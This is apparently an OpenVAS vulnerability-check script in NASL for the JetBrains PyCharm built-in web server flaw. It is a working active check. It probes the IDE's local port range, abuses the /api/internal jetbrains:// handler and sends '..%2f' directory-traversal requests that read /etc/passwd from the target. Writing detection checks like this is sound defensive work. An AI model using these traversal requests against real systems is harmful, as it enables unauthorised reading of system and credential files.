- ###############################################################################
- # OpenVAS Vulnerability Test
- # $Id$
- #
- # JetBrains (Pycharm) Remote Code Execution and Local File Disclosure Vulnerability (Active Check)
- #
- # Authors:
- # Tameem Eissa <tameem.eissa@greenbone.net>
- #
- # Copyright:
- # Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net
- #
- # This program is free software; you can redistribute it and/or modify
- # it under the terms of the GNU General Public License version 2
- # (or any later version), as published by the Free Software Foundation.
- #
- # This program is distributed in the hope that it will be useful,
- # but WITHOUT ANY WARRANTY; without even the implied warranty of
- # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
- # GNU General Public License for more details.
- #
- # You should have received a copy of the GNU General Public License
- # along with this program; if not, write to the Free Software
- # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
- ###############################################################################
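if(description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.107231");
  script_version("$Revision$");
  # Only confidentiality is scored: the check demonstrates file disclosure,
  # not code execution.
  script_tag(name:"cvss_base", value:"5.0");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:N/A:N");
  script_tag(name:"last_modification", value:"$Date$");
  script_tag(name:"creation_date", value:"2017-08-21 10:25:40 +0530 (Mon, 21 Aug 2017)");
  # "exploit" QoD: a positive result means /etc/passwd was actually read
  # from the target, not that a vulnerable version was recognised.
  script_tag(name:"qod_type", value:"exploit");
  script_name("JetBrains (Pycharm) Remote Code Execution and Local File Disclosure (Active Check)");
  script_tag(name:"summary", value:"This host is running the built-in web server of a JetBrains IDE (PyCharm) and is prone to multiple vulnerabilities.");
  script_tag(name:"vuldetect", value:"Sends crafted HTTP GET and POST requests to the IDE's built-in
  web server and checks whether the response contains the contents of /etc/passwd.");
  script_tag(name:"insight", value:"Multiple flaws are due to improper restriction of requested paths
  to the project directory: directory traversal sequences are not rejected, so files outside the
  served project can be read.");
  script_tag(name:"impact", value:"Successful exploitation will allow
  remote attackers to read arbitrary files on the target system.

  Impact Level: System/Application");
  script_tag(name:"affected", value:"JetBrains PyCharm 2016 releases before May 2016. Other IntelliJ-based IDEs (Android Studio, WebStorm, IntelliJ IDEA and several others) were affected as well; this check only covers PyCharm.");
  script_tag(name:"solution", value:"Update to a fixed version as described in the vendor advisory: https://blog.jetbrains.com/blog/2016/05/11/security-update-for-intellij-based-ides-v2016-1-and-older-versions/");
  script_tag(name:"solution_type", value:"VendorFix");
  script_xref(name:"URL", value:"http://blog.saynotolinux.com/blog/2016/08/15/jetbrains-ide-remote-code-execution-and-local-file-disclosure-vulnerability-analysis/");
  script_xref(name:"URL", value:"https://blog.jetbrains.com/blog/2016/05/11/security-update-for-intellij-based-ides-v2016-1-and-older-versions/");
  # NOTE(review): this check actively reads a file from the target; ACT_ATTACK
  # may be the more appropriate category - confirm against feed conventions.
  script_category(ACT_GATHER_INFO);
  # Year aligned with the file header and creation_date (was 2015).
  script_copyright("Copyright (C) 2017 Greenbone Networks GmbH");
  script_family("Web application abuses");
  script_dependencies("find_service.nasl");
  exit(0);
}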
- include( "http_func.inc");
- include( "http_keepalive.inc");
- include( "misc_func.inc" );
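# Probes a short list of common project names for a readable
# /<name>/.idea/workspace.xml on the IDE's built-in web server (global
# `port`).
#
# Returns the first candidate that answers with HTTP 200, or NULL when none
# does. (The original returned the last dictionary entry even when nothing
# matched, because the foreach variable kept its final value.)
function guessProjectName()
{
  local_var candidates, name, url, req, res;

  candidates = make_list(
    "ideas",
    "purescript",
    "image-analogies",
    "powerline-shell",
    "python-oauth2",
    "create",
    "jquery-boilerplate",
    "sqlbrite",
    "foresight.js",
    "iOS-Core-Animation-Advanced-Techniques",
    "elemental",
    "peek",
    "TheAmazingAudioEngine",
    "orientdb",
    "testing" );

  foreach name( candidates )
  {
    url = "/" + name + "/.idea/workspace.xml";
    req = http_get_req( port:port, url:url, add_headers:make_array( "Content-Type", "application/xml", "Connection", "keep-alive" ) );
    res = http_keepalive_send_recv( port:port, data:req );
    if( isnull( res ) ) continue;

    # Anchored on the status line so a "200" inside an error body does not count.
    if( res =~ "^HTTP/1\.[01] 200" )
      return name;
  }

  return NULL;
}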
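# Builds enough URL-encoded "../" segments ("..%2f") to climb from the
# directory `path` back to the filesystem root.
#
# The depth is the number of "/" characters in `path`; for an absolute path
# without trailing or doubled slashes that equals its directory depth
# (e.g. "/a/b/c" -> "..%2f..%2f..%2f"). A NULL or empty path yields "".
#
# The original ignored its `path` parameter and read the global
# `projectPath` instead, so it only worked when called from
# leakWithPyCharmHelpers().
function buildDotsSegsToRoot( path )
{
  local_var i, depth, segs;

  depth = 0;
  for( i = 0; i < strlen( path ); i++ )
  {
    if( path[i] == "/" )
      depth++;
  }

  segs = "";
  for( i = 0; i < depth; i++ )
    segs += "..%2f";

  return segs;
}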
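# Traversal through the IDE's bundled "helpers" directory.
#
# `res` is the response to /api/about?more=true, from which the IDE's
# homePath is extracted. <homePath>/helpers is first registered as a project
# through the /api/internal endpoint (jetbrains:// URL handler), then
# /etc/passwd is requested relative to that project with enough "..%2f"
# segments to reach the root.
#
# Returns a report string on success, NULL otherwise. Reporting is left to
# the caller (the original called security_message() here with an undefined
# `report` and returned nothing, so the host was flagged with empty data
# and the caller then exited without reporting).
function leakWithPyCharmHelpers( res )
{
  local_var homePath, url, data, req, dotSegs, body, report;
  # projectPath is deliberately NOT declared local_var: buildDotsSegsToRoot()
  # may still read the global of that name instead of its parameter.

  # Bounded capture: a greedy ".*" swallows everything up to the last quote
  # on the line when further quoted fields follow.
  homePath = eregmatch( pattern:'homePath": "([^"]+)"', string:res );
  if( isnull( homePath ) ) return NULL;

  projectPath = homePath[1] + "/helpers";

  # Register the helpers directory as a project via the jetbrains:// handler.
  url  = "/api/internal";
  data = '{"url": "jetbrains://whatever/open//' + projectPath + '"}';
  req  = http_post_req( port:port, url:url, data:data, add_headers:make_array( "Content-Type", "application/x-www-form-urlencoded", "Connection", "keep-alive" ) );
  http_keepalive_send_recv( port:port, data:req );

  dotSegs = buildDotsSegsToRoot( path:projectPath );
  url = "/helpers/" + dotSegs + "etc/passwd";
  req = http_get_req( port:port, url:url, add_headers:make_array( "Content-Type", "application/xml", "Connection", "keep-alive" ) );
  # Full response is needed: the original requested bodyonly and then
  # tested for "HTTP/1.. 200 OK", which could never match.
  res = http_keepalive_send_recv( port:port, data:req, bodyonly:FALSE );
  if( isnull( res ) ) return NULL;

  if( res =~ "^HTTP/1\.[01] 200" && egrep( pattern:"root:.*:0:[01]:", string:res ) )
  {
    body = res;
    if( stridx( res, '\r\n\r\n' ) >= 0 )
      body = substr( res, stridx( res, '\r\n\r\n' ) + 4 );

    report  = report_vuln_url( port:port, url:url ) + '\n\n';
    report += 'Here are the contents of the file "/etc/passwd" that\n' +
              'OpenVAS was able to read from the remote host:\n\n' + body;
    return report;
  }

  return NULL;
}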
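# Traversal from a guessed project `name`: requests
# /<name>/..%2f[..%2f...]etc/passwd with one to four levels of traversal.
#
# Returns a report string (vulnerable URL plus the file contents read) on
# the first hit, NULL when no depth works. The original reported an
# undefined `res` as the file contents because http_vuln_check() does not
# return the response body; the request is now issued directly so the body
# is available, and the leftover debug:TRUE is gone.
function leakWithProject( name )
{
  local_var depth, dotSegs, url, req, res, body, report;

  dotSegs = "";
  for( depth = 1; depth < 5; depth++ )
  {
    dotSegs += "..%2f";
    url = "/" + name + "/" + dotSegs + "etc/passwd";

    req = http_get_req( port:port, url:url );
    res = http_keepalive_send_recv( port:port, data:req, bodyonly:FALSE );
    if( isnull( res ) ) continue;

    if( res =~ "^HTTP/1\.[01] 200" && egrep( pattern:"root:.*:0:[01]:", string:res ) )
    {
      body = res;
      if( stridx( res, '\r\n\r\n' ) >= 0 )
        body = substr( res, stridx( res, '\r\n\r\n' ) + 4 );

      report  = report_vuln_url( port:port, url:url ) + '\n\n';
      report += 'Here are the contents of the file "/etc/passwd" that\n' +
                'OpenVAS was able to read from the remote host:\n\n' + body;
      return report;
    }
  }

  return NULL;
}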
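# Locate the IDE's built-in web server: it listens on 63342 by default and
# takes the next free port when that is busy, so a small range is probed.
for( port = 63342; port < 63352; port++ )
{
  if( get_port_state( port ) ) break;
}
if( ! get_port_state( port ) ) exit( 0 );

# "more=true" makes /api/about include homePath/configPath; the random
# parameter defeats caching. The original sent "?more-true?a=", which is
# neither the right parameter name nor valid query syntax, so the extended
# output was never returned.
random = rand_str( length:13, charset:"0123456789" );
url = "/api/about?more=true&a=" + random;
req = http_get_req( port:port, url:url, add_headers:make_array( "Content-Type", "application/xml", "Connection", "keep-alive" ) );
res = http_keepalive_send_recv( port:port, data:req );

# Bail out unless this really is PyCharm. The original tested
# `! res >< "PayCharm"` - operands reversed, product name misspelled, and
# the negation applied to `res` rather than to the match.
if( isnull( res ) || "PyCharm" >!< res ) exit( 0 );

configPath = eregmatch( pattern:'configPath": "([^"]*config)"', string:res );
if( ! isnull( configPath ) )
{
  # Extended about-output available: traverse via the bundled helpers
  # directory. The argument is passed by name, as NASL requires.
  Report = leakWithPyCharmHelpers( res:res );
}
else
{
  # Fall back to guessing a project name that is already being served.
  ProjectName = guessProjectName();
  if( ! isnull( ProjectName ) )
    Report = leakWithProject( name:ProjectName );
}

if( isnull( Report ) ) exit( 0 );

security_message( port:port, data:Report );
exit( 0 );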